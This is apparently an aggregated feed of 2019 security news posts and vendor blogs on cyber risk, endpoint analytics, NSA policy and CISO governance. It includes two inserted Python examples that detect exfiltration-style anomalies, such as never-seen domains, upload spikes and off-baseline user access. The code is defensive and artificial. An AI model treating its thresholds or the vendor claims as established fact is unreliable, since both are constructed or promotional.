Cyber risks are the top concern among businesses of all sizes for the first time since the Travelers Companies’ survey began in 2014. Of the 1,200 business leaders who participated in the survey, 55% said they worry some or a great deal about cyber risks, ahead of medical cost inflation (54%), employee benefit costs (53%), the ability to attract and retain talent (46%) and legal liability (44%). As concerns about cyber threats have grown, a … More

The post Cyber risks are the top concern among businesses of all sizes appeared first on Help Net Security.

How Will the CMMC Impact My Business and How Can We Prepare? Part 3 of 3

Combining Cyber Standards – Is ‘Unified’ Always A Good Approach? The CMMC enforcement model will require a significant adjustment to the way contractors conduct government business – from procurement to execution. In Part 2 of this series, I discussed the possible impacts of having your company’s security rating made public. In Part 3, I would like […]… Read More

The post How Will the CMMC Impact My Business and How Can We Prepare? Part 3 of 3 appeared first on The State of Security.

Forrester names Microsoft a Leader in 2019 Endpoint Security Suites Wave

As we continue as a company to empower every person on the planet to achieve more, we keep delivering on our mission through products that achieve the highest recognition in the industry. For the last several years we’ve been working hard to provide the leading endpoint security product in the market.

Today, we are proud to announce that Microsoft is positioned as a leader in The Forrester Wave™: Endpoint Security Suites, Q3 2019, receiving among the second highest scores in both the strategy and market presence categories. According to Forrester, “Microsoft has a compelling vision for the future where endpoint threat prevention and detection are completely integrated and inseparable.”

We believe this latest recognition represents our ability to provide best-in-class protection and deliver on innovations that learn and evolve to keep pace with today’s threat landscape.

This recognition comes at a great point in our evolution journey. We are guided by a strong vision to provide the industry-best protection and we are committed to continue pushing the limits in protection, detection, and response capabilities to secure our customers.

Download this complimentary full report and read the analysis behind Microsoft’s positioning as a Leader.

For more information on our endpoint protection platform, or to sign up for a trial, visit our Microsoft Defender Advanced Threat Protection (ATP) page.

The Forrester Wave™: Endpoint Security Suites, Q3 2019, Chris Sherman, September 23, 2019.

This graphic was published by Forrester Research as part of a larger research document and should be evaluated in the context of the entire document. The Forrester document is available upon request from https://reprints.forrester.com/#/assets/2/108/RES146636/reports

The post Forrester names Microsoft a Leader in 2019 Endpoint Security Suites Wave appeared first on Microsoft Security.

Find What Your Endpoint Anti-Malware is Missing with CESA Built on Splunk

There are many aspects to securing an endpoint beyond finding the malware on it. What do you know about the behavior of your endpoints? Can you track anomalous traffic? Can you tell what the applications and other software processes are up to? What is happening when the device is off the corporate network? Has a user or device evaded endpoint security measures? With insight into such issues, you can generate visibility that not only follows endpoints on and off network, but also finds threats often not addressed by anti-malware solutions.

With this in mind, Cisco has created a solution unlike anything available in the industry today — Cisco Endpoint Security Analytics (CESA) Built on Splunk. This new solution brings together the unparalleled endpoint behavioral visibility of Cisco’s AnyConnect Network Visibility Module (NVM) and the data transformation power of the Splunk analytics platform. The result is an added layer of deep endpoint visibility that transforms endpoint-centric data into insights to proactively detect and mitigate network threats.

If you already use AnyConnect NVM, you know it creates a lot of detailed, endpoint-specific data. But by building and productizing CESA on top of Splunk, we’ve paired that data with an equally comprehensive and cost-effective analytics tool. CESA addresses endpoint security use cases such as:

  • Unapproved applications and SaaS visibility
  • Endpoint security evasion
  • Attribution of user to device to application to traffic and destination
  • Zero-trust monitoring
  • Data loss detection
  • Day-zero malware and threat hunting
  • Asset inventory

The behavioral data produced by NVM complements anti-malware agents like Cisco Advanced Malware Protection (AMP) for Endpoints that primarily focus on file analysis to detect malware on endpoints, which identifies known issues. But because CESA analyzes user and device behavior and identifies changes and anomalies, it enables threat hunters and analysts to discover malicious or suspicious endpoint activity, often without an additional endpoint agent. Where antivirus and other endpoint solutions would miss these threats, CESA provides early detection that increases security posture. CESA endpoint analytics also complements the broad network visibility provided by Cisco Stealthwatch by following endpoints on and off network, as well as enabling deep endpoint insight down to the user account, device details and network interface levels of the endpoint. Together CESA and Stealthwatch cover every aspect of network and endpoint behavior, leaving no blind spot unchecked.

How we address endpoint blindness

Even as security products continue to integrate, endpoint blindness is a persistent problem. Information security (infosec) teams need to know more about what is happening on the endpoints to anticipate where attacks are more likely to occur.

By leveraging the NVM telemetry that endpoints provide, we gain a better understanding of users’ network behaviors and where threats are going to happen. These insights can raise potential red flags like:

  • Are my endpoints suddenly communicating with domains we’ve not seen in our environment before?
  • Has a user changed behavior suddenly, using applications and visiting hosts they don’t usually access?
  • Does an endpoint have unusual traffic patterns? Is it uploading or downloading more than usual? Is someone hoarding or exfiltrating data?
  • Are any machines using unapproved applications or SaaS services?
  • Has security been disabled on an endpoint?
  • Which endpoints have known bad files or applications?
  • What are my users doing when they are not connected to my network?
  • Which devices and operating systems are in use in my endpoint environment?
  • Who is using each device and what are they doing with it?
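Three of the red flags above (never-seen destination domains, a user running an application they have not used before, and a device uploading far more than usual) expressed as baseline-versus-observation checks over constructed NVM-style flow records. This is an added example, not Cisco's or Splunk's code: the field names (user, device, process, dest, bytes_out) are an assumed simplification of NVM's per-flow telemetry, and the upload threshold is an assumed tuning value.

```python
"""Behavioural red-flag checks over NVM-style endpoint flow records (added example)."""
from collections import defaultdict

# Constructed baseline window: what these users and devices normally do.
BASELINE = [
    {"user": "alice", "device": "LT-0413", "process": "outlook.exe", "dest": "mail.example.com", "bytes_out": 40_000},
    {"user": "alice", "device": "LT-0413", "process": "chrome.exe", "dest": "wiki.example.com", "bytes_out": 15_000},
    {"user": "bob", "device": "LT-0777", "process": "teams.exe", "dest": "teams.example.com", "bytes_out": 90_000},
    {"user": "bob", "device": "LT-0777", "process": "chrome.exe", "dest": "wiki.example.com", "bytes_out": 10_000},
]

# Constructed observation window, assumed to cover the same length of time as the baseline.
OBSERVED = [
    {"user": "alice", "device": "LT-0413", "process": "outlook.exe", "dest": "mail.example.com", "bytes_out": 38_000},
    {"user": "bob", "device": "LT-0777", "process": "teams.exe", "dest": "teams.example.com", "bytes_out": 85_000},
    {"user": "bob", "device": "LT-0777", "process": "synctool.exe", "dest": "files.unseen-example.net", "bytes_out": 900_000_000},
]


def build_baseline(records):
    """Summarise a baseline window: known domains, processes per user, upload bytes per device."""
    domains = set()
    procs = defaultdict(set)
    upload = defaultdict(int)
    for r in records:
        domains.add(r["dest"])
        procs[r["user"]].add(r["process"])
        upload[r["device"]] += r["bytes_out"]
    return domains, procs, upload


def detect(baseline, observed, upload_factor=5.0):
    """Return sorted (kind, subject, detail) alerts for the observed window.

    upload_factor is an assumed threshold: a device whose observed uploads exceed
    upload_factor times its baseline total is flagged as an upload spike."""
    domains, procs, base_upload = build_baseline(baseline)
    alerts = set()
    upload = defaultdict(int)
    for r in observed:
        if r["dest"] not in domains:
            alerts.add(("new-domain", r["device"], r["dest"]))
        if r["process"] not in procs[r["user"]]:   # also fires for a never-seen user
            alerts.add(("new-process", r["user"], r["process"]))
        upload[r["device"]] += r["bytes_out"]
    for device, total in upload.items():
        if device not in base_upload:
            alerts.add(("new-device", device, "no baseline activity"))
        elif total > upload_factor * base_upload[device]:
            alerts.add(("upload-spike", device, f"{total} bytes vs baseline {base_upload[device]}"))
    return sorted(alerts)


if __name__ == "__main__":
    for alert in detect(BASELINE, OBSERVED):
        print(alert)
```

In a Splunk deployment the same three questions become saved searches over the NVM index; the point here is that each check needs only the per-flow fields plus a baseline window, not a malware signature.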

It’s important to note that CESA is integrated into the Cisco Security infrastructure. CESA works together with network visibility from Cisco Stealthwatch and endpoint control from Cisco AMP for Endpoints. Additionally, Cisco Identity Services Engine (ISE) is used to quarantine users when identified as suspicious. These integrations serve to further increase the security posture of the network.

Cisco’s CSIRT team uses CESA

Many of our case studies come from our partners and customers, but this time our Cisco infosec team put together a case study as they leveraged CESA within the Cisco organization. They used the solution to collect and analyze the data generated by NVM across approximately 96,000 endpoints, and extract context such as user, device, application, location, and destination. The analysis of this data, from when the user is both on- and off-prem, helped Cisco infosec reduce incident investigation time from days to hours, while filling gaps in endpoint visibility.

“Splunk makes accessing the data from NVM, writing queries, and analyzing the data very easy,” said Cisco CSIRT’s Imran Islam.

Before CESA, the infosec team would struggle to determine which user is associated with what machine. And drilling down further was difficult if not impossible – from identifying machine to traffic; from traffic to the application or software process producing it; and then the traffic’s destination, whether inbound or outbound. It was reported by the Cisco infosec team that 80% of CESA use cases could not have been addressed by other technology.

Partnering to create a more secure network

At Cisco, we’re leading the industry in multi-vendor partnering solutions because we understand that collaboration is key to our customers having effective and efficient security across their networks — from endpoint to data center and cloud to campus. In fact, the Internet Engineering Task Force (IETF) recently standardized the XMPP-Grid security data exchange framework – based on Cisco Platform Exchange Grid (pxGrid) – which enables seamless collaboration and the sharing of information between security platforms from multiple vendors.

While no one product can achieve absolute security, no security solution exists in complete isolation. As security products become more interconnected, share context for threats, and participate in incident response, the risk of data breaches and security incidents is increasingly mitigated. This is why we believe in working so closely with our partners like Splunk through the Cisco Security Technical Alliance to integrate solutions that protect against emerging threats and improve customer security.

Splunk’s analytics-driven security solutions continue to serve as a perfect complement to Cisco Security. And we’re excited to see CESA deliver endpoint visibility and advanced threat detection for our customers. Cisco AnyConnect (Cisco’s VPN Client) is already deployed by over 150 million endpoints, and many customers are already running the Splunk console, which makes CESA a simple addition that will bring immense value for infosec’s ability to anticipate and stop endpoint threats before they manifest on the network.

If you don’t yet have these products, learn more about CESA and how you can add Cisco AnyConnect NVM and Splunk here. Stay tuned in the coming weeks for added CESA integration with Cisco Umbrella to enable enforcement at the domain level.

You can learn more about how Cisco infosec utilized CESA in this case study. 

Want to get started with CESA today? If you already have Splunk and AnyConnect, download and install the Cisco AnyConnect NVM App for Splunk from Splunkbase to create dashboards. Then, download and install the Cisco NVM Technology Add-On for Splunk from Splunkbase to bring NVM data into Splunk. Finally, turn on NVM telemetry in your AnyConnect environment as outlined in these tech docs.

Finally, be sure to follow me on Twitter and LinkedIn for the latest announcements from Cisco Security.

Sophos Managed Threat Response: An evolved approach to proactive security protection

In its 2019 market guide for managed detection and response (MDR) services, Gartner forecasted that by 2024, 25% of organizations will be using MDR services, up from less than 5% today. While the percentage might not end up as high as that, there’s no doubt that the demand for these services will increase rapidly, fueled by organizations’ inability to acquire, train and retain cybersecurity talent and to keep pace with the rising sophistication and complexity … More

The post Sophos Managed Threat Response: An evolved approach to proactive security protection appeared first on Help Net Security.

NSA on the Future of National Cybersecurity

Glenn Gerstell, the General Counsel of the NSA, wrote a long and interesting op-ed for the New York Times where he outlined a long list of cyber risks facing the US.

There are four key implications of this revolution that policymakers in the national security sector will need to address:

The first is that the unprecedented scale and pace of technological change will outstrip our ability to effectively adapt to it. Second, we will be in a world of ceaseless and pervasive cyberinsecurity and cyberconflict against nation-states, businesses and individuals. Third, the flood of data about human and machine activity will put such extraordinary economic and political power in the hands of the private sector that it will transform the fundamental relationship, at least in the Western world, between government and the private sector. Finally, and perhaps most ominously, the digital revolution has the potential for a pernicious effect on the very legitimacy and thus stability of our governmental and societal structures.

He then goes on to explain these four implications. It's all interesting, and it's the sort of stuff you don't generally hear from the NSA. He talks about technological changes causing social changes, and the need for people who understand that. (Hooray for public-interest technologists.) He talks about national security infrastructure in private hands, at least in the US. He talks about a massive geopolitical restructuring -- a fundamental change in the relationship between private tech corporations and government. He talks about recalibrating the Fourth Amendment (of course).

The essay is more about the problems than the solutions, but there is a bit at the end:

The first imperative is that our national security agencies must quickly accept this forthcoming reality and embrace the need for significant changes to address these challenges. This will have to be done in short order, since the digital revolution's pace will soon outstrip our ability to deal with it, and it will have to be done at a time when our national security agencies are confronted with complex new geopolitical threats.

Much of what needs to be done is easy to see -- developing the requisite new technologies and attracting and retaining the expertise needed for that forthcoming reality. What is difficult is executing the solution to those challenges, most notably including whether our nation has the resources and political will to effect that solution. The roughly $60 billion our nation spends annually on the intelligence community might have to be significantly increased during a time of intense competition over the federal budget. Even if the amount is indeed so increased, spending additional vast sums to meet the challenges in an effective way will be a daunting undertaking. Fortunately, the same digital revolution that presents these novel challenges also sometimes provides the new tools (A.I., for example) to deal with them.

The second imperative is we must adapt to the unavoidable conclusion that the fundamental relationship between government and the private sector will be greatly altered. The national security agencies must have a vital role in reshaping that balance if they are to succeed in their mission to protect our democracy and keep our citizens safe. While there will be good reasons to increase the resources devoted to the intelligence community, other factors will suggest that an increasing portion of the mission should be handled by the private sector. In short, addressing the challenges will not necessarily mean that the national security sector will become massively large, with the associated risks of inefficiency, insufficient coordination and excessively intrusive surveillance and data retention.

A smarter approach would be to recognize that as the capabilities of the private sector increase, the scope of activities of the national security agencies could become significantly more focused, undertaking only those activities in which government either has a recognized advantage or must be the only actor. A greater burden would then be borne by the private sector.

It's an extraordinary essay, less for its contents and more for the speaker. This is not the sort of thing the NSA publishes. The NSA doesn't opine on broad technological trends and their social implications. It doesn't publicly try to predict the future. It doesn't philosophize for 6000 unclassified words. And, given how hard it would be to get something like this approved for public release, I am left to wonder what the purpose of the essay is. Is the NSA trying to lay the groundwork for some policy initiative? Some legislation? A budget request? What?

Charlie Warzel has a snarky response. His conclusion about the purpose:

He argues that the piece "is not in the spirit of forecasting doom, but rather to sound an alarm." Translated: Congress, wake up. Pay attention. We've seen the future and it is a sweaty, pulsing cyber night terror. So please give us money (the word "money" doesn't appear in the text, but the word "resources" appears eight times and "investment" shows up 11 times).

Susan Landau has a more considered response, which is well worth reading. She calls the essay a proposal for a moonshot (which is another way of saying "they want money"). And she has some important pushbacks on the specifics.

I don't expect the general counsel and I will agree on what the answers to these questions should be. But I strongly concur on the importance of the questions and that the United States does not have time to waste in responding to them. And I thank him for raising these issues in so public a way.

I agree with Landau.

Slashdot thread.

Vulnerability in Cisco Webex and Zoom may expose online meetings to snooping

Cequence Security’s CQ Prime Threat Research Team discovered a vulnerability in the Cisco Webex and Zoom video conferencing platforms that potentially allows an attacker to enumerate (list) and view active meetings that are not protected. The web conferencing market includes nearly three dozen vendors, some of whom may use similar meeting identification techniques. Although the CQ Prime team did not test each of these products, it is possible they could be susceptible as well. … More

The post Vulnerability in Cisco Webex and Zoom may expose online meetings to snooping appeared first on Help Net Security.

Behavioral Analytics: Why It Is Significant to Enterprise CyberSecurity

Do you want to know why behavioral analytics is vital to your enterprise? Are you even aware of what behavioral analytics is? What are the threats that it can detect quickly? Is your business in danger because of these threats?

As your company grows, you also need to add more assets and users to your enterprise network. Your business workflows undergo permanent changes as you add applications and databases. These upgrades mean more efficiency and collaboration that will result in more profitability. However, they also translate to more liabilities in terms of cybersecurity.

Each user, digital asset, or application can be an accessible doorway for hackers to invade your network. Also, faulty programming or malice perpetrated by any user can be a threat inside your business. In both cases, they can damage not only your network but your business processes as well.

What can you do? Monitoring every user can be frustrating and overwhelming. Even if you have the workforce, your IT security team can’t sustain the demand. Maintaining visibility on applications and users is close to impossible as your enterprise grows. Is there hope? Yes, there is!

Behavioral analytics can help solve this dilemma efficiently. What follows is a thorough discussion of the topic.

The Basics of Behavioral Analytics

Behavioral analytics analyzes the patterns, activities, and trends of applications and users. It searches for any quirk or habit in your workflows, and each user has their own profile in the system. For instance, your employee, Arthur, uses “Database A” four times a day. With current technology, behavioral analytics can also note the endpoint he uses when he requests access. It records and stores these observations in a behavioral baseline.

Against this baseline, the system can recognize when Arthur, for example, requests access to Database B ten times on a particular workday. It can also determine when he makes a request from thousands of miles away from his usual location. Both behaviors fall outside Arthur’s baseline, and the security system treats them as such.

The system can then block the access requests and alert your IT security team so it can investigate. Arthur may be on a business trip that day and legitimately need information outside his usual scope; your team can record the unusual circumstances so that Arthur is allowed to access the files.

The same scenario could instead indicate an attacker using Arthur’s credentials to reach sensitive enterprise data. If so, your IT security team can trigger incident response, cut off the attacker’s access, and return the account to Arthur’s control. It can also fix any vulnerability it discovers along the way. The same process applies to data traffic, data movements, and application requests.

Behavioral analytics leverages statistical analysis and machine learning to monitor the behavior of your users and search for anomalies.
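To make the baseline-and-deviation idea concrete, here is an added Python example (not code from the article): it learns Arthur's usual daily request rate per resource and his usual location from a constructed history, then flags the two deviations the article describes (Database B requested ten times, and a request from far away). The names, coordinates, event format and thresholds are all assumptions made for the example.

```python
# Added example: a minimal per-user behavioral baseline and anomaly check.
# Every name, event, coordinate and threshold below is constructed for
# illustration and is not taken from the article or any product.
from collections import defaultdict
from dataclasses import dataclass
from math import asin, cos, radians, sin, sqrt


@dataclass(frozen=True)
class AccessEvent:
    user: str
    resource: str
    day: str      # ISO date the request was made, e.g. "2019-10-01"
    lat: float    # approximate location of the requesting endpoint
    lon: float


def haversine_km(lat1, lon1, lat2, lon2):
    """Great-circle distance in km between two (lat, lon) points."""
    p1, p2 = radians(lat1), radians(lat2)
    dphi = p2 - p1
    dlmb = radians(lon2 - lon1)
    a = sin(dphi / 2) ** 2 + cos(p1) * cos(p2) * sin(dlmb / 2) ** 2
    return 2 * 6371.0 * asin(sqrt(a))


def build_baselines(events):
    """Learn one profile per user from historical access events.

    A profile holds the mean number of requests per active day for each
    resource the user touched, plus the user's usual (centroid) location.
    """
    per_user = defaultdict(list)
    for ev in events:
        per_user[ev.user].append(ev)
    baselines = {}
    for user, evs in per_user.items():
        active_days = {ev.day for ev in evs}
        counts = defaultdict(int)
        for ev in evs:
            counts[ev.resource] += 1
        baselines[user] = {
            "mean_daily": {r: c / len(active_days) for r, c in counts.items()},
            "home": (sum(ev.lat for ev in evs) / len(evs),
                     sum(ev.lon for ev in evs) / len(evs)),
        }
    return baselines


def score_day(baselines, user, day_events, rate_factor=3.0, max_km=1000.0):
    """Compare one day of a user's requests with that user's baseline.

    Returns a list of human-readable findings (empty if the day looks normal).
    Assumed thresholds: a never-before-seen resource, a resource requested at
    more than rate_factor times its usual daily rate, or any request from
    further than max_km away from the usual location each produce a finding.
    """
    profile = baselines.get(user)
    if profile is None:
        return [f"{user}: no baseline yet, manual review required"]
    findings = []
    counts = defaultdict(int)
    for ev in day_events:
        counts[ev.resource] += 1
    for resource, n in counts.items():
        usual = profile["mean_daily"].get(resource)
        if usual is None:
            findings.append(f"{user}: {n} request(s) to never-before-seen resource {resource}")
        elif n > rate_factor * usual:
            findings.append(f"{user}: {n} requests to {resource} vs usual {usual:.1f}/day")
    home_lat, home_lon = profile["home"]
    for ev in day_events:
        km = haversine_km(home_lat, home_lon, ev.lat, ev.lon)
        if km > max_km:
            findings.append(f"{user}: request to {ev.resource} from {km:.0f} km away from usual location")
            break  # one location finding per day is enough to raise an alert
    return findings


# Constructed sample history: ten working days of Arthur using Database A
# four times a day from an office in New York.
NYC = (40.7128, -74.0060)
LONDON = (51.5074, -0.1278)
HISTORY = [AccessEvent("arthur", "Database A", f"2019-10-{d:02d}", *NYC)
           for d in range(1, 11) for _ in range(4)]
BASELINES = build_baselines(HISTORY)


def arthur_normal_day():
    """A day that matches the baseline: no findings expected."""
    return score_day(BASELINES, "arthur",
                     [AccessEvent("arthur", "Database A", "2019-10-14", *NYC)] * 4)


def arthur_suspicious_day():
    """The article's scenario: ten requests to Database B from far away."""
    return score_day(BASELINES, "arthur",
                     [AccessEvent("arthur", "Database B", "2019-10-15", *LONDON)] * 10)


if __name__ == "__main__":
    for line in arthur_normal_day() + arthur_suspicious_day():
        print(line)
```

The findings are what the article calls the trigger for your IT security team: in practice they would be written to the SIEM as alerts rather than printed, and the thresholds would be tuned per environment.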

Why Is Behavioral Analytics Critical to Cybersecurity?

Jack Vance wrote The Moon Moth. It is a famous short story in the science-fiction genre. The plot revolves around an imposter who can alter his appearance but can’t conceal his habits and tastes.

The same observation holds for real attackers. In a report by Centrify, a privileged access management vendor, 74% of breaches begin with a compromised privileged account. Other studies show that at least 80% of breaches start with compromised accounts. In other words, attackers prefer to disguise themselves as one of your users.

The damage attackers can cause is considerable: reputational loss and downtime, especially when they disrupt your network. They can also try to tamper with your users’ baseline behaviors. Whenever they attempt this, behavioral analytics can flag the attempts and stop them, triggering a response from your IT team.

This capability also relieves your IT security staff of an excessive burden. The team may already feel overworked with threat hunting and user requests, and a staffing crisis can develop if things get out of control. Fortunately, behavioral analytics operates automatically and helps your IT staff streamline its investigations and save time.

Deploying Behavioral Analytics

For your organization, you must first consider your size, user base, IT infrastructure, industry, and applications. You must also think about your future growth and scaling plans for the next five years. This should be the initial step in selecting any cybersecurity solution, yet many companies neglect it.

Most enterprises choose speed over optimal performance: they select the solution that adequately solves their immediate problems. The result of this way of thinking is an IT infrastructure full of solutions with serious integration issues.

If you want long-term solutions to your cybersecurity issues, you must consider behavioral analytics. If you’ve decided to incorporate it in your enterprise, your next step is choosing a robust Security Information and Event Management (SIEM) solution.

Why Do You Need a SIEM Solution?

A next-generation SIEM solution builds on behavioral analytics: it includes user and entity behavior analytics (UEBA), and you can subscribe to threat intelligence feeds to help you detect new or evolving threats quickly.

You may think that a SIEM solution is complicated, and you are right. At its core, the system is a log management and analysis tool with a behavioral analysis layer on top. Security teams recognize that the digital perimeter cannot deflect 100% of threats; a SIEM lets you detect the threats that get through before they wreak havoc on your enterprise.

Attackers are everywhere, waiting for an opportunity to strike. If you want to monitor and stop them, next-generation analytics and cybersecurity capabilities let you do so. A SIEM solution with UEBA and related capabilities is an excellent strategy for catching these attackers. It prevents them from intruding and causing severe downtime, which can compromise your reputation in the business world.

The post Behavioral Analytics: Why It Is Significant to Enterprise CyberSecurity appeared first on .

Assessing risk: Measuring the health of your infosec environment

There is an uncomfortable truth that many organizations are not conducting comprehensive assessments of their information security risk; or those that do aren’t getting much value out of assessment exercises — because they simply don’t know how. Given the massive amounts of data organizations hold, accurately assessing these risks is difficult. So is determining how to best control them once they are identified. That’s especially needed for businesses in highly regulated industries that can face … More

The post Assessing risk: Measuring the health of your infosec environment appeared first on Help Net Security.

Five questions every CEO should be asking about cybersecurity

Estimated reading time: 3 minutes

As the captain of the ship, the Chief Executive Officer (CEO) plays a very important role in how an enterprise addresses cybersecurity issues and concerns. When the CEO provides a buy-in towards making enterprise security safer, it trickles down as a new mindset for the entire organization.

The 9th Annual Cost of Cybercrime Study 2019 revealed a significant statistic – the average cost of cybercrime for an organization increased by $1.4 million to $13 million in 2019.

More than anything else, this is the most important statistic which illustrates why cybersecurity is one of the most important issues that a modern organization must deal with. It is no longer a question of IT or Information Security – it is a business issue as important as anything else which leaders need to deal with urgently.

But to create that mindset, what kind of questions should a CEO be asking? Here are five important ones:

  1. How prepared is the enterprise right now to handle cyber risks?

The CEO, as the most important leader in the company, must know, in minute detail, how prepared the company is for current threats. The leadership must have detailed visibility into how the enterprise is dealing with these risks, what measures are being taken and also what threats are slipping through the net. This question is the starting point for the CEO, and the answer will provide a complete understanding of where the enterprise currently stands on cybersecurity. On that basis, plans for the future can be made.

  2. Does the senior leadership buy into the current cybersecurity framework? If not, why?

CEOs head organizations but they can never be a one-person army. Great organizations surround CEOs with a team of competent leaders who come together to form one unified front. It is in the same way that a company’s senior leadership team comprising the C-suite must also showcase a united stand towards cybersecurity measures taken by the enterprise. This helps in better compliance and inculcation of a security-first mindset among employees. However, this is easier said than done and that is why a CEO must ask this question.

If the CEO finds out that this is not the case, the first step is to get the entire leadership team on board.

  3. What is our plan for responding to cybersecurity incidents? How regularly has it been tested?

Cybersecurity is not a zero-sum game – there is always scope for malware to sneak through despite the best possible measures. This is why an Incident Response Plan comes in handy, as it details the actions to be taken for different kinds of incidents. The CEO must be aware of every intricate detail of this plan because, in a crisis, they will need to show that they are in control. CEOs must also keep abreast of how regularly this plan is tested so that they are aware of any shortcomings in it.

  4. Do the employees have a cybersecurity mindset?

Employees are the single biggest factor in cybersecurity preparedness for an enterprise. The CEO must be aware of the current culture of cybersecurity in the organization – are employees aware of the dangers that cyber threats may pose or do they still remain blissfully unaware? If the answer is the latter, the CEO must immediately put in place a plan to create a mindset of cybersecurity in the entire organization.

  5. How does the enterprise handle insider threats?

Cybersecurity is not always an external affair – in many cases, danger lurks within the enterprise in the form of insider threats and disgruntled employees. It is not just the InfoSec team that has to be aware of this – the CEO must ask leading questions about this dangerous type of threat and the measures the company is taking to tackle it.

Creating a cybersecurity culture in an enterprise is not easy, but investing in a strong enterprise solution goes a long way in protecting an organization from the varied threats that exist. Seqrite’s range of solutions enables security and greater productivity on the cybersecurity journey.

The post Five questions every CEO should be asking about cybersecurity appeared first on Seqrite Blog.

38% of the Fortune 500 do not have a CISO

To uncover whether the world’s leading companies are committed to enhancing their cybersecurity initiatives, Bitglass researched the members of the 2019 Fortune 500 and analyzed public-facing information such as what is available on their websites. 77% of the Fortune 500 make no indication on their websites about who is responsible for their security strategy. Additionally, 52% do not have any language on their websites about how they protect the data of customers and partners (beyond … More

The post 38% of the Fortune 500 do not have a CISO appeared first on Help Net Security.

Email is an open door for malicious actors looking to exploit businesses

There’s an alarming scale of risks businesses are up against in a time when email is proving an open door for cybercriminals and malicious actors looking to disrupt, exploit and destroy businesses, according to Wire. The report is developed in collaboration with global poker champion and astrophysicist, Liv Boeree. P​oker is a game of making calculated, strategic decisions in high-stakes situations. As such, Liv is able to draw parallels between the poker table and the … More

The post Email is an open door for malicious actors looking to exploit businesses appeared first on Help Net Security.

BlackBerry launches BlackBerry Labs to develop cybersecurity solutions

BlackBerry Ltd. is looking to ramp up its cybersecurity research and development, announcing today the launch of a new business unit entitled BlackBerry Advanced Technology Development Labs (BlackBerry Labs).

The unit will be headed by BlackBerry’s chief technology officer, Charles Eagan, and will include a team of over 120 software developers, architects, researchers, product leads and security experts.

“The establishment of BlackBerry Labs is the latest in a series of strategic moves we’ve taken to ensure our customers are protected across all endpoints and verticals in the new IoT,” said Eagan in a press release. “Today’s cybersecurity industry is rapidly advancing and BlackBerry Labs will operate as its own business unit solely focused on innovating and developing the technologies of tomorrow that will be necessary for our sustained competitive success, from A to Z; Artificial Intelligence to Zero-Trust environments. We believe this highly experienced team will allow us to remain nimble, engaged and, above all else, proactive in our efforts to be the most trusted security software leader in the market.”

While the overarching scope will be researching and developing security solutions, BlackBerry said initial work will be specifically focused on machine learning approaches to security in partnership with the company’s existing Cylance, Enterprise, and QNX business units.

Our World in Transition and Our Future Demands

October is Cybersecurity Awareness Month and for me, it’s a time to reflect on where we’ve been and how far we’ve come, study the trends and challenges we face today, and look ahead to the next generation of opportunities facing not only the security community, but society at large.

In my more than 30 years in the security industry, it’s been interesting to see how technology has evolved and changed the world. Security started off as a ‘systems’ conversation. Now, technology touches everyone’s lives, and as a result, cybersecurity affects us all – individuals, businesses, cities, countries, our global community.

From Use to Reliance

During our lifetimes, we’ve shifted from using technology to, in very subtle ways, becoming reliant on it. Whether we realize it or not, these subtleties have made us dependent on technology. The notion of ‘always on’ access to data is highly disruptive to us when we don’t have it. Take maps for example: using a printed map is foreign to us today, and when the maps on our devices don’t work, we’re lost, literally.

When technology is unavailable, in many respects we feel ‘out of the loop’ and behind in knowing what’s going on. There’s a lagging indicator that says, ‘Now that we have access to current information, we always expect this level of connectivity – we depend on it.’ That reliance makes securing the data and the systems that deliver it to us that much more vital.

A Confluence of Change – All in Three Years

Since 2017, three major transitions have occurred that illustrate how complicated cybersecurity has become for us all globally. These transitions have caused security professionals to feel the pressure and scrutiny from a number of organizations that have upped their games. They’re having to catch up to a confluence of changes, all occurring at the same time:

1. Technology

Prior to 2017, IT predominantly built and ran an organization’s technology infrastructure, spending on security and hoping it works, relying on best-of-breed products, and managing it all reactively.

We all needed cybersecurity, but how could we net the best results – the greatest level of efficacy – from the solutions we purchased? Exactly how much value are we getting when spending on a solution? Is it all integrated as a best strategy or are we simply buying technology from the leading brand name or best advertised?

Today, leading IT teams build, buy and run security, use a ‘best-of-integrated’ architecture approach and emphasize visibility, controls, measures and proactive approaches to security that drive efficacy and value.

2. Laws, Regulations, and Customer Requirements

This transition shows the increasing influence that laws, regulations and customer requirements have on a technology or service provider to its clients, and in turn, to their customers, citizens, colleagues, families and friends.

The formalization of laws and regulations – from the EU NIS Directive to GDPR to the Australian Government Protective Security Policy Framework to the California Consumer Privacy Act, to name a few – has driven greater scrutiny and reform. It has accelerated substantially in a short period of time, from ‘do-it-yourself’ disharmonious regulations and rules to a set of country, inter-country and international standards.

Now corporate and government leaders across the international community are being held accountable. This transition from varying self-rule and self-regulation to accountability, breach reporting and disclosure highlights the implications of mishandling data and privacy through significant fines and executive firings.

In many respects, it’s been a long time coming. What’s interesting is that now that it’s here, it’s caught many off-guard – and it’s by no means slowing down.

3. Internal Oversight

When I started in InfoSec, security was mainly an engineering or computer science discipline. The security team was often avoided so that they couldn’t suppress innovation because of security concerns. The business was self-governing with inconsistent levels of oversight.

Today, internal reporting to and oversight by executive leadership, the CEO, the board of directors and shareholders are becoming standard practice to ensure proper governance. In part, it is a response to the regulatory landscape and the need for higher levels of accountability and oversight from within. It’s also based on the criticality of technology moving from something we use to something we rely on to deliver a service.

All three of these transitions came to the fore in too short a period of time for anyone to know how to effectively react, govern and solve for them. And we are all going through this together, determining our own strategies to face the challenges, net the value they deliver, and understand how to be safe and secure in and around it all.

Our Future Demands

Today, there are about 4 billion internet users globally – all told about 10X of what it was in 2000. We’re in a world where everything is being connected and generating data. This will have significant impact on the next few years in particular and even more substantially into the future.

By next year, there will be about 200 billion devices ‘on air,’ which includes cars, telemetry in cities, sensors and a multitude of other connected devices. Two hundred billion is almost an ephemeral number, but it’s not to be underestimated, because the number of vendors creating IoT-connected technology is growing probably 3-4X every year over the prior year. That’s a trend that I don’t see slowing down any time soon.

By 2021, cybercrime is estimated to be a $6 trillion industry – a very profitable industry, though I don’t recommend it as a career choice. It does illustrate the depth and breadth of the challenge – that it’s an international and global issue that we all have to work together to solve because it’s something that we all face.

Raising the Bar for a More Secure Future

Governments and businesses globally are raising the bar to meet the challenge around product assurance, cloud assurance, IoT, lawful intercept, data protection, privacy and the like. Some 30-odd countries are writing or revising their cybersecurity strategies and each can have profound implications on how data is shared and how systems are built.

So, during Cybersecurity Awareness Month, consider what you can do to make the world safer and more secure, and take action. What can you do as an individual? How are you protecting yourself online and helping your business, colleagues, friends and family to do the same? Each individual act, when taken together, can move us all to a more secure future.

We’re not looking for headlines that show ‘good’ or ‘bad.’ We need trend lines that show that what we’re doing collectively is moving us all towards lower risk. As long as the trend line is going in the right direction, we’re doing what we need to do – and we must all do our part.

